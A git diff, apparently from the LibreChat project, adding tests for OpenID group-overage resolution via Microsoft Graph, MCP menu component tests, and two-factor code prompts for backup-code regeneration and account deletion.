expect(openidClient.genericGrantRequest).toHaveBeenCalledWith( + expect.anything(), + 'urn:ietf:params:oauth:grant-type:jwt-bearer', + expect.objectContaining({ + scope: 
'https://graph.microsoft.com/User.Read', + assertion: tokenset.access_token, + requested_token_use: 'on_behalf_of', + }), + ); + + expect(undici.fetch).toHaveBeenCalledWith( + 'https://graph.microsoft.com/v1.0/me/getMemberObjects', + expect.objectContaining({ + headers: expect.objectContaining({ + Authorization: 'Bearer exchanged_graph_token', + }), + }), + ); + }); + + it('caches the exchanged token and reuses it on subsequent calls', async () => { + const openidClient = require('openid-client'); + const getLogStores = require('~/cache/getLogStores'); + const mockSet = jest.fn(); + const mockGet = jest + .fn() + .mockResolvedValueOnce(undefined) + .mockResolvedValueOnce({ access_token: 'exchanged_graph_token' }); + getLogStores.mockReturnValue({ get: mockGet, set: mockSet }); + + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required'] }), + }); + + // First call: cache miss → OBO exchange → cache set + await validate(tokenset); + expect(mockSet).toHaveBeenCalledWith( + '1234:overage', + { access_token: 'exchanged_graph_token' }, + 3600000, + ); + expect(openidClient.genericGrantRequest).toHaveBeenCalledTimes(1); + + // Second call: cache hit → no new OBO exchange + openidClient.genericGrantRequest.mockClear(); + await validate(tokenset); + expect(openidClient.genericGrantRequest).not.toHaveBeenCalled(); + }); + }); + + describe('admin role group overage', () => { + it('resolves admin groups via Graph when overage is detected for admin role', async () => { + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH 
= 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required', 'admin-group-id'] }), + }); + + const { user } = await validate(tokenset); + + expect(user.role).toBe('ADMIN'); + }); + + it('does not grant admin when overage groups do not contain admin role', async () => { + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required', 'other-group'] }), + }); + + const { user } = await validate(tokenset); + + expect(user).toBeTruthy(); + expect(user.role).toBeUndefined(); + }); + + it('reuses already-resolved overage groups for admin role check (no duplicate Graph call)', async () => { + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ 
hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required', 'admin-group-id'] }), + }); + + await validate(tokenset); + + // Graph API should be called only once (for required role), admin role reuses the result + expect(undici.fetch).toHaveBeenCalledTimes(1); + }); + + it('demotes existing admin when overage groups no longer contain admin role', async () => { + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + const existingAdminUser = { + _id: 'existingAdminId', + provider: 'openid', + email: tokenset.claims().email, + openidId: tokenset.claims().sub, + username: 'adminuser', + name: 'Admin User', + role: 'ADMIN', + }; + + findUser.mockImplementation(async (query) => { + if (query.openidId === tokenset.claims().sub || query.email === tokenset.claims().email) { + return existingAdminUser; + } + return null; + }); + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required'] }), + }); + + const { user } = await validate(tokenset); + + expect(user.role).toBe('USER'); + }); + + it('does not attempt overage for admin role when token kind is not id', async () => { + process.env.OPENID_REQUIRED_ROLE = 'requiredRole'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'roles'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + 
process.env.OPENID_ADMIN_ROLE = 'admin'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'access'; + + jwtDecode.mockReturnValue({ + roles: ['requiredRole'], + hasgroups: true, + }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + const { user } = await validate(tokenset); + + // No Graph call since admin uses access token (not id) + expect(undici.fetch).not.toHaveBeenCalled(); + expect(user.role).toBeUndefined(); + }); + + it('resolves admin via Graph independently when OPENID_REQUIRED_ROLE is not configured', async () => { + delete process.env.OPENID_REQUIRED_ROLE; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['admin-group-id'] }), + }); + + const { user } = await validate(tokenset); + expect(user.role).toBe('ADMIN'); + expect(undici.fetch).toHaveBeenCalledTimes(1); + }); + + it('denies admin when OPENID_REQUIRED_ROLE is absent and Graph does not contain admin group', async () => { + delete process.env.OPENID_REQUIRED_ROLE; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['other-group'] }), + }); + + const { user } = await validate(tokenset); + 
expect(user).toBeTruthy(); + expect(user.role).toBeUndefined(); + }); + + it('denies login and logs error when OBO exchange throws', async () => { + const openidClient = require('openid-client'); + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + openidClient.genericGrantRequest.mockRejectedValueOnce(new Error('OBO exchange rejected')); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + const { user, details } = await validate(tokenset); + expect(user).toBe(false); + expect(details.message).toBe('You must have "group-required" role to log in.'); + expect(undici.fetch).not.toHaveBeenCalled(); + }); + + it('denies login when OBO exchange returns no access_token', async () => { + const openidClient = require('openid-client'); + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + openidClient.genericGrantRequest.mockResolvedValueOnce({ expires_in: 3600 }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + const { user, details } = await validate(tokenset); + expect(user).toBe(false); + expect(details.message).toBe('You must have "group-required" role to log in.'); + expect(undici.fetch).not.toHaveBeenCalled(); + }); + }); + it('should attempt to download and save the avatar if picture is provided', async () => { // Act const { user } = await validate(tokenset); diff --git a/client/src/components/Chat/Input/Files/AttachFileChat.tsx b/client/src/components/Chat/Input/Files/AttachFileChat.tsx index 00a0b7aaa8..2f954d01d5 100644 --- a/client/src/components/Chat/Input/Files/AttachFileChat.tsx +++ 
b/client/src/components/Chat/Input/Files/AttachFileChat.tsx @@ -91,7 +91,7 @@ function AttachFileChat({ if (isAssistants && endpointSupportsFiles && !isUploadDisabled) { return ; - } else if (isAgents || (endpointSupportsFiles && !isUploadDisabled)) { + } else if ((isAgents || endpointSupportsFiles) && !isUploadDisabled) { return ( > = {}; let mockAgentQueryData: Partial | undefined; @@ -65,6 +67,7 @@ function renderComponent(conversation: Record | null, disableIn describe('AttachFileChat', () => { beforeEach(() => { + mockFileConfig = defaultFileConfig; mockAgentsMap = {}; mockAgentQueryData = undefined; mockAttachFileMenuProps = {}; @@ -148,6 +151,60 @@ describe('AttachFileChat', () => { }); }); + describe('upload disabled rendering', () => { + it('renders null for agents endpoint when fileConfig.agents.disabled is true', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + [EModelEndpoint.agents]: { disabled: true }, + }, + }); + const { container } = renderComponent({ + endpoint: EModelEndpoint.agents, + agent_id: 'agent-1', + }); + expect(container.innerHTML).toBe(''); + }); + + it('renders null for agents endpoint when disableInputs is true', () => { + const { container } = renderComponent( + { endpoint: EModelEndpoint.agents, agent_id: 'agent-1' }, + true, + ); + expect(container.innerHTML).toBe(''); + }); + + it('renders AttachFile for assistants endpoint when not disabled', () => { + renderComponent({ endpoint: EModelEndpoint.assistants }); + expect(screen.getByTestId('attach-file')).toBeInTheDocument(); + }); + + it('renders AttachFileMenu when provider-specific config overrides agents disabled', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + Moonshot: { disabled: false, fileLimit: 5 }, + [EModelEndpoint.agents]: { disabled: true }, + }, + }); + mockAgentsMap = { + 'agent-1': { provider: 'Moonshot', model_parameters: {} } as Partial, + }; + renderComponent({ endpoint: EModelEndpoint.agents, agent_id: 'agent-1' }); + 
expect(screen.getByTestId('attach-file-menu')).toBeInTheDocument(); + }); + + it('renders null for assistants endpoint when fileConfig.assistants.disabled is true', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + [EModelEndpoint.assistants]: { disabled: true }, + }, + }); + const { container } = renderComponent({ + endpoint: EModelEndpoint.assistants, + }); + expect(container.innerHTML).toBe(''); + }); + }); + describe('endpointFileConfig resolution', () => { it('passes Moonshot-specific file config for agent with Moonshot provider', () => { mockAgentsMap = { diff --git a/client/src/components/Chat/Input/MCPSelect.tsx b/client/src/components/Chat/Input/MCPSelect.tsx index a5356f5094..13a86c856a 100644 --- a/client/src/components/Chat/Input/MCPSelect.tsx +++ b/client/src/components/Chat/Input/MCPSelect.tsx @@ -1,4 +1,4 @@ -import React, { memo, useMemo, useCallback, useRef } from 'react'; +import React, { memo, useMemo } from 'react'; import * as Ariakit from '@ariakit/react'; import { ChevronDown } from 'lucide-react'; import { PermissionTypes, Permissions } from 'librechat-data-provider'; @@ -27,24 +27,9 @@ function MCPSelectContent() { const menuStore = Ariakit.useMenuStore({ focusLoop: true }); const isOpen = menuStore.useState('open'); - const focusedElementRef = useRef(null); const selectedCount = mcpValues?.length ?? 
0; - // Wrap toggleServerSelection to preserve focus after state update - const handleToggle = useCallback( - (serverName: string) => { - // Save currently focused element - focusedElementRef.current = document.activeElement as HTMLElement; - toggleServerSelection(serverName); - // Restore focus after React re-renders - requestAnimationFrame(() => { - focusedElementRef.current?.focus(); - }); - }, - [toggleServerSelection], - ); - const selectedServers = useMemo(() => { if (!mcpValues || mcpValues.length === 0) { return []; @@ -103,6 +88,8 @@ function MCPSelectContent() { ))} diff --git a/client/src/components/Chat/Input/MCPSubMenu.tsx b/client/src/components/Chat/Input/MCPSubMenu.tsx index b0b8fad1bb..f8e617cba3 100644 --- a/client/src/components/Chat/Input/MCPSubMenu.tsx +++ b/client/src/components/Chat/Input/MCPSubMenu.tsx @@ -35,7 +35,6 @@ const MCPSubMenu = React.forwardRef( placement: 'right', }); - // Don't render if no MCP servers are configured if (!selectableServers || selectableServers.length === 0) { return null; } diff --git a/client/src/components/Chat/Input/__tests__/MCPSelect.spec.tsx b/client/src/components/Chat/Input/__tests__/MCPSelect.spec.tsx new file mode 100644 index 0000000000..7662ee5e6e --- /dev/null +++ b/client/src/components/Chat/Input/__tests__/MCPSelect.spec.tsx @@ -0,0 +1,142 @@ +import React from 'react'; +import userEvent from '@testing-library/user-event'; +import { render, screen, within } from '@testing-library/react'; +import MCPSelect from '../MCPSelect'; + +const mockToggleServerSelection = jest.fn(); + +const defaultMcpServerManager = { + localize: (key: string) => key, + isPinned: true, + mcpValues: [] as string[], + placeholderText: 'MCP Servers', + selectableServers: [ + { serverName: 'server-a', config: { title: 'Server A' } }, + { serverName: 'server-b', config: { title: 'Server B' } }, + ], + connectionStatus: {}, + isInitializing: () => false, + getConfigDialogProps: () => null, + toggleServerSelection: 
mockToggleServerSelection, + getServerStatusIconProps: () => null, +}; + +let mockCanUseMcp = true; +let mockMcpServerManager = { ...defaultMcpServerManager }; + +jest.mock('~/Providers', () => ({ + useBadgeRowContext: () => ({ + conversationId: 'test-conv', + storageContextKey: undefined, + mcpServerManager: mockMcpServerManager, + }), +})); + +jest.mock('~/hooks', () => ({ + useLocalize: () => (key: string) => key, + useHasAccess: () => mockCanUseMcp, +})); + +jest.mock('@librechat/client', () => { + // eslint-disable-next-line @typescript-eslint/no-require-imports + const R = require('react'); + return { + TooltipAnchor: ({ + children, + render, + }: { + children: React.ReactNode; + render: React.ReactElement; + }) => R.cloneElement(render, {}, ...(Array.isArray(children) ? children : [children])), + MCPIcon: ({ className }: { className?: string }) => R.createElement('span', { className }), + Spinner: ({ className }: { className?: string }) => R.createElement('span', { className }), + }; +}); + +jest.mock('~/components/MCP/MCPConfigDialog', () => ({ + __esModule: true, + default: () => null, +})); + +describe('MCPSelect', () => { + beforeEach(() => { + jest.clearAllMocks(); + mockCanUseMcp = true; + mockMcpServerManager = { ...defaultMcpServerManager }; + }); + + it('renders the menu button', () => { + render(); + expect(screen.getByRole('button', { name: /MCP Servers/i })).toBeInTheDocument(); + }); + + it('opens menu on button click and shows server items', async () => { + const user = userEvent.setup(); + render(); + + await user.click(screen.getByRole('button', { name: /MCP Servers/i })); + + const menu = screen.getByRole('menu', { name: /com_ui_mcp_servers/i }); + expect(menu).toBeVisible(); + expect(within(menu).getByRole('menuitemcheckbox', { name: /Server A/i })).toBeInTheDocument(); + expect(within(menu).getByRole('menuitemcheckbox', { name: /Server B/i })).toBeInTheDocument(); + }); + + it('closes menu on Escape', async () => { + const user = 
userEvent.setup(); + render(); + + await user.click(screen.getByRole('button', { name: /MCP Servers/i })); + expect(screen.getByRole('menu', { name: /com_ui_mcp_servers/i })).toBeVisible(); + + await user.keyboard('{Escape}'); + expect(screen.getByRole('button', { name: /MCP Servers/i })).toHaveAttribute( + 'aria-expanded', + 'false', + ); + }); + + it('keeps menu open after toggling a server item', async () => { + const user = userEvent.setup(); + render(); + + await user.click(screen.getByRole('button', { name: /MCP Servers/i })); + await user.click(screen.getByRole('menuitemcheckbox', { name: /Server A/i })); + + expect(mockToggleServerSelection).toHaveBeenCalledWith('server-a'); + expect(screen.getByRole('menu', { name: /com_ui_mcp_servers/i })).toBeVisible(); + }); + + it('arrow-key navigation wraps from last item to first', async () => { + const user = userEvent.setup(); + render(); + + await user.click(screen.getByRole('button', { name: /MCP Servers/i })); + const items = screen.getAllByRole('menuitemcheckbox'); + expect(items).toHaveLength(2); + + await user.keyboard('{ArrowDown}'); + await user.keyboard('{ArrowDown}'); + await user.keyboard('{ArrowDown}'); + expect(items[0]).toHaveFocus(); + }); + + it('renders nothing when user lacks MCP access', () => { + mockCanUseMcp = false; + const { container } = render(); + expect(container.firstChild).toBeNull(); + expect(screen.queryByRole('button')).not.toBeInTheDocument(); + }); + + it('renders nothing when selectableServers is empty', () => { + mockMcpServerManager = { ...defaultMcpServerManager, selectableServers: [] }; + const { container } = render(); + expect(container.firstChild).toBeNull(); + }); + + it('renders nothing when not pinned and no servers selected', () => { + mockMcpServerManager = { ...defaultMcpServerManager, isPinned: false, mcpValues: [] }; + const { container } = render(); + expect(container.firstChild).toBeNull(); + }); +}); diff --git 
a/client/src/components/Chat/Input/__tests__/MCPSubMenu.spec.tsx b/client/src/components/Chat/Input/__tests__/MCPSubMenu.spec.tsx new file mode 100644 index 0000000000..be8fb5d9c2 --- /dev/null +++ b/client/src/components/Chat/Input/__tests__/MCPSubMenu.spec.tsx @@ -0,0 +1,156 @@ +import React from 'react'; +import * as Ariakit from '@ariakit/react'; +import userEvent from '@testing-library/user-event'; +import { render, screen, within } from '@testing-library/react'; +import MCPSubMenu from '../MCPSubMenu'; + +const mockToggleServerSelection = jest.fn(); +const mockSetIsPinned = jest.fn(); + +const defaultMcpServerManager = { + isPinned: true, + mcpValues: [] as string[], + setIsPinned: mockSetIsPinned, + placeholderText: 'MCP Servers', + selectableServers: [ + { serverName: 'server-a', config: { title: 'Server A' } }, + { serverName: 'server-b', config: { title: 'Server B', description: 'Second server' } }, + ], + connectionStatus: {}, + isInitializing: () => false, + getConfigDialogProps: () => null, + toggleServerSelection: mockToggleServerSelection, + getServerStatusIconProps: () => null, +}; + +let mockMcpServerManager = { ...defaultMcpServerManager }; + +jest.mock('~/Providers', () => ({ + useBadgeRowContext: () => ({ + storageContextKey: undefined, + mcpServerManager: mockMcpServerManager, + }), +})); + +jest.mock('~/hooks', () => ({ + useLocalize: () => (key: string) => key, + useHasAccess: () => true, +})); + +jest.mock('@librechat/client', () => { + // eslint-disable-next-line @typescript-eslint/no-require-imports + const R = require('react'); + return { + MCPIcon: ({ className }: { className?: string }) => R.createElement('span', { className }), + PinIcon: ({ unpin }: { unpin?: boolean }) => + R.createElement('span', { 'data-testid': unpin ? 
'unpin-icon' : 'pin-icon' }), + Spinner: ({ className }: { className?: string }) => R.createElement('span', { className }), + }; +}); + +jest.mock('~/components/MCP/MCPConfigDialog', () => ({ + __esModule: true, + default: () => null, +})); + +function ParentMenu({ children }: { children: React.ReactNode }) { + return ( + + {/* eslint-disable-next-line i18next/no-literal-string */} + Parent + {children} + + ); +} + +function renderSubMenu(props: React.ComponentProps = {}) { + return render( + + + , + ); +} + +describe('MCPSubMenu', () => { + beforeEach(() => { + jest.clearAllMocks(); + mockMcpServerManager = { ...defaultMcpServerManager }; + }); + + it('renders nothing when selectableServers is empty', () => { + mockMcpServerManager = { ...defaultMcpServerManager, selectableServers: [] }; + renderSubMenu(); + expect(screen.queryByText('MCP Servers')).not.toBeInTheDocument(); + }); + + it('renders the submenu trigger with default placeholder', () => { + renderSubMenu(); + expect(screen.getByText('MCP Servers')).toBeInTheDocument(); + }); + + it('renders custom placeholder when provided', () => { + renderSubMenu({ placeholder: 'Custom Label' }); + expect(screen.getByText('Custom Label')).toBeInTheDocument(); + expect(screen.queryByText('MCP Servers')).not.toBeInTheDocument(); + }); + + it('opens submenu and shows real server items', async () => { + const user = userEvent.setup(); + renderSubMenu(); + + await user.click(screen.getByText('MCP Servers')); + + const menu = screen.getByRole('menu', { name: /com_ui_mcp_servers/i }); + expect(menu).toBeVisible(); + expect(within(menu).getByRole('menuitemcheckbox', { name: /Server A/i })).toBeInTheDocument(); + expect(within(menu).getByRole('menuitemcheckbox', { name: /Server B/i })).toBeInTheDocument(); + }); + + it('keeps menu open after toggling a server item', async () => { + const user = userEvent.setup(); + renderSubMenu(); + + await user.click(screen.getByText('MCP Servers')); + await 
user.click(screen.getByRole('menuitemcheckbox', { name: /Server A/i })); + + expect(mockToggleServerSelection).toHaveBeenCalledWith('server-a'); + expect(screen.getByRole('menu', { name: /com_ui_mcp_servers/i })).toBeVisible(); + }); + + it('calls setIsPinned with toggled value when pin button is clicked', async () => { + const user = userEvent.setup(); + mockMcpServerManager = { ...defaultMcpServerManager, isPinned: false }; + renderSubMenu(); + + await user.click(screen.getByRole('button', { name: /com_ui_pin/i })); + + expect(mockSetIsPinned).toHaveBeenCalledWith(true); + }); + + it('arrow-key navigation wraps from last item to first', async () => { + const user = userEvent.setup(); + renderSubMenu(); + + await user.click(screen.getByText('MCP Servers')); + const items = screen.getAllByRole('menuitemcheckbox'); + expect(items).toHaveLength(2); + + await user.click(items[1]); + expect(items[1]).toHaveFocus(); + + await user.keyboard('{ArrowDown}'); + expect(items[0]).toHaveFocus(); + }); + + it('pin button shows unpin label when pinned', () => { + mockMcpServerManager = { ...defaultMcpServerManager, isPinned: true }; + renderSubMenu(); + expect(screen.getByRole('button', { name: /com_ui_unpin/i })).toBeInTheDocument(); + }); + + it('pin button shows pin label when not pinned', () => { + mockMcpServerManager = { ...defaultMcpServerManager, isPinned: false }; + renderSubMenu(); + expect(screen.getByRole('button', { name: /com_ui_pin/i })).toBeInTheDocument(); + }); +}); diff --git a/client/src/components/Messages/Content/Error.tsx b/client/src/components/Messages/Content/Error.tsx index 469e29fe32..ff2f2d7e90 100644 --- a/client/src/components/Messages/Content/Error.tsx +++ b/client/src/components/Messages/Content/Error.tsx @@ -41,6 +41,7 @@ const errorMessages = { [ErrorTypes.NO_USER_KEY]: 'com_error_no_user_key', [ErrorTypes.INVALID_USER_KEY]: 'com_error_invalid_user_key', [ErrorTypes.NO_BASE_URL]: 'com_error_no_base_url', + [ErrorTypes.INVALID_BASE_URL]: 
'com_error_invalid_base_url', [ErrorTypes.INVALID_ACTION]: `com_error_${ErrorTypes.INVALID_ACTION}`, [ErrorTypes.INVALID_REQUEST]: `com_error_${ErrorTypes.INVALID_REQUEST}`, [ErrorTypes.REFUSAL]: 'com_error_refusal', diff --git a/client/src/components/Nav/Favorites/FavoriteItem.tsx b/client/src/components/Nav/Favorites/FavoriteItem.tsx index 173be27d00..248008869d 100644 --- a/client/src/components/Nav/Favorites/FavoriteItem.tsx +++ b/client/src/components/Nav/Favorites/FavoriteItem.tsx @@ -126,8 +126,8 @@ export default function FavoriteItem({ className={cn( 'absolute right-2 flex items-center', isPopoverActive - ? 'opacity-100' - : 'opacity-0 group-focus-within:opacity-100 group-hover:opacity-100', + ? 'pointer-events-auto opacity-100' + : 'pointer-events-none opacity-0 group-focus-within:pointer-events-auto group-focus-within:opacity-100 group-hover:pointer-events-auto group-hover:opacity-100', )} onClick={(e) => e.stopPropagation()} > diff --git a/client/src/components/Nav/SettingsTabs/Account/BackupCodesItem.tsx b/client/src/components/Nav/SettingsTabs/Account/BackupCodesItem.tsx index c89ce61fff..e66cb7b08a 100644 --- a/client/src/components/Nav/SettingsTabs/Account/BackupCodesItem.tsx +++ b/client/src/components/Nav/SettingsTabs/Account/BackupCodesItem.tsx @@ -1,12 +1,23 @@ import React, { useState } from 'react'; import { RefreshCcw } from 'lucide-react'; +import { useSetRecoilState } from 'recoil'; import { motion, AnimatePresence } from 'framer-motion'; -import { TBackupCode, TRegenerateBackupCodesResponse, type TUser } from 'librechat-data-provider'; +import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp'; +import type { + TRegenerateBackupCodesResponse, + TRegenerateBackupCodesRequest, + TBackupCode, + TUser, +} from 'librechat-data-provider'; import { - OGDialog, + InputOTPSeparator, + InputOTPGroup, + InputOTPSlot, OGDialogContent, OGDialogTitle, OGDialogTrigger, + OGDialog, + InputOTP, Button, Label, Spinner, @@ -15,7 +26,6 @@ 
import { } from '@librechat/client'; import { useRegenerateBackupCodesMutation } from '~/data-provider'; import { useAuthContext, useLocalize } from '~/hooks'; -import { useSetRecoilState } from 'recoil'; import store from '~/store'; const BackupCodesItem: React.FC = () => { @@ -24,25 +34,30 @@ const BackupCodesItem: React.FC = () => { const { showToast } = useToastContext(); const setUser = useSetRecoilState(store.user); const [isDialogOpen, setDialogOpen] = useState(false); + const [otpToken, setOtpToken] = useState(''); + const [useBackup, setUseBackup] = useState(false); const { mutate: regenerateBackupCodes, isLoading } = useRegenerateBackupCodesMutation(); + const needs2FA = !!user?.twoFactorEnabled; + const fetchBackupCodes = (auto: boolean = false) => { - regenerateBackupCodes(undefined, { + let payload: TRegenerateBackupCodesRequest | undefined; + if (needs2FA && otpToken.trim()) { + payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() }; + } + + regenerateBackupCodes(payload, { onSuccess: (data: TRegenerateBackupCodesResponse) => { - const newBackupCodes: TBackupCode[] = data.backupCodesHash.map((codeHash) => ({ - codeHash, - used: false, - usedAt: null, - })); + const newBackupCodes: TBackupCode[] = data.backupCodesHash; setUser((prev) => ({ ...prev, backupCodes: newBackupCodes }) as TUser); + setOtpToken(''); showToast({ message: localize('com_ui_backup_codes_regenerated'), status: 'success', }); - // Trigger file download only when user explicitly clicks the button. if (!auto && newBackupCodes.length) { const codesString = data.backupCodes.join('\n'); const blob = new Blob([codesString], { type: 'text/plain;charset=utf-8' }); @@ -66,6 +81,8 @@ const BackupCodesItem: React.FC = () => { fetchBackupCodes(false); }; + const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6); + return (
@@ -161,10 +178,10 @@ const BackupCodesItem: React.FC = () => { ); })}
-
+
)} + {needs2FA && ( +
+ +
+ + {useBackup ? ( + + + + + + + + + + + ) : ( + <> + + + + + + + + + + + + + )} + +
+ +
+ )} diff --git a/client/src/components/Nav/SettingsTabs/Account/DeleteAccount.tsx b/client/src/components/Nav/SettingsTabs/Account/DeleteAccount.tsx index e879a0f2c6..d9c432c6a2 100644 --- a/client/src/components/Nav/SettingsTabs/Account/DeleteAccount.tsx +++ b/client/src/components/Nav/SettingsTabs/Account/DeleteAccount.tsx @@ -1,16 +1,22 @@ -import { LockIcon, Trash } from 'lucide-react'; import React, { useState, useCallback } from 'react'; +import { LockIcon, Trash } from 'lucide-react'; +import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp'; import { - Label, - Input, - Button, - Spinner, - OGDialog, + InputOTPSeparator, OGDialogContent, OGDialogTrigger, OGDialogHeader, + InputOTPGroup, OGDialogTitle, + InputOTPSlot, + OGDialog, + InputOTP, + Spinner, + Button, + Label, + Input, } from '@librechat/client'; +import type { TDeleteUserRequest } from 'librechat-data-provider'; import { useDeleteUserMutation } from '~/data-provider'; import { useAuthContext } from '~/hooks/AuthContext'; import { LocalizeFunction } from '~/common'; @@ -21,16 +27,27 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea const localize = useLocalize(); const { user, logout } = useAuthContext(); const { mutate: deleteUser, isLoading: isDeleting } = useDeleteUserMutation({ - onMutate: () => logout(), + onSuccess: () => logout(), }); const [isDialogOpen, setDialogOpen] = useState(false); const [isLocked, setIsLocked] = useState(true); + const [otpToken, setOtpToken] = useState(''); + const [useBackup, setUseBackup] = useState(false); + + const needs2FA = !!user?.twoFactorEnabled; const handleDeleteUser = () => { - if (!isLocked) { - deleteUser(undefined); + if (isLocked) { + return; } + + let payload: TDeleteUserRequest | undefined; + if (needs2FA && otpToken.trim()) { + payload = useBackup ? 
{ backupCode: otpToken.trim() } : { token: otpToken.trim() }; + } + + deleteUser(payload); }; const handleInputChange = useCallback( @@ -42,6 +59,8 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea [user?.email], ); + const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6); + return ( <> @@ -79,7 +98,60 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea (e) => handleInputChange(e.target.value), )}
- {renderDeleteButton(handleDeleteUser, isDeleting, isLocked, localize)} + {needs2FA && ( +
+ +
+ + {useBackup ? ( + + + + + + + + + + + ) : ( + <> + + + + + + + + + + + + + )} + +
+ +
+ )} + {renderDeleteButton(handleDeleteUser, isDeleting, isLocked || !otpReady, localize)}
